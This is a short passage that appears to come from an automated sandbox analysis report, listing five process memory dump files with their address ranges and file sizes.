                                                                        • memory/6848-8657-0x00007FF9799A0000-0x00007FF97A461000-memory.dmp

                                                                          Filesize

                                                                          10.8MB

                                                                        • memory/6944-8658-0x0000000140000000-0x0000000140523000-memory.dmp

                                                                          Filesize

                                                                          5.1MB

                                                                        • memory/7136-4203-0x0000022B7E070000-0x0000022B7E090000-memory.dmp

                                                                          Filesize

                                                                          128KB

                                                                        • memory/7136-4207-0x0000022B7E030000-0x0000022B7E050000-memory.dmp

                                                                          Filesize

                                                                          128KB

                                                                        • memory/7136-4210-0x0000022B7E440000-0x0000022B7E460000-memory.dmp

                                                                          Filesize

                                                                          128KB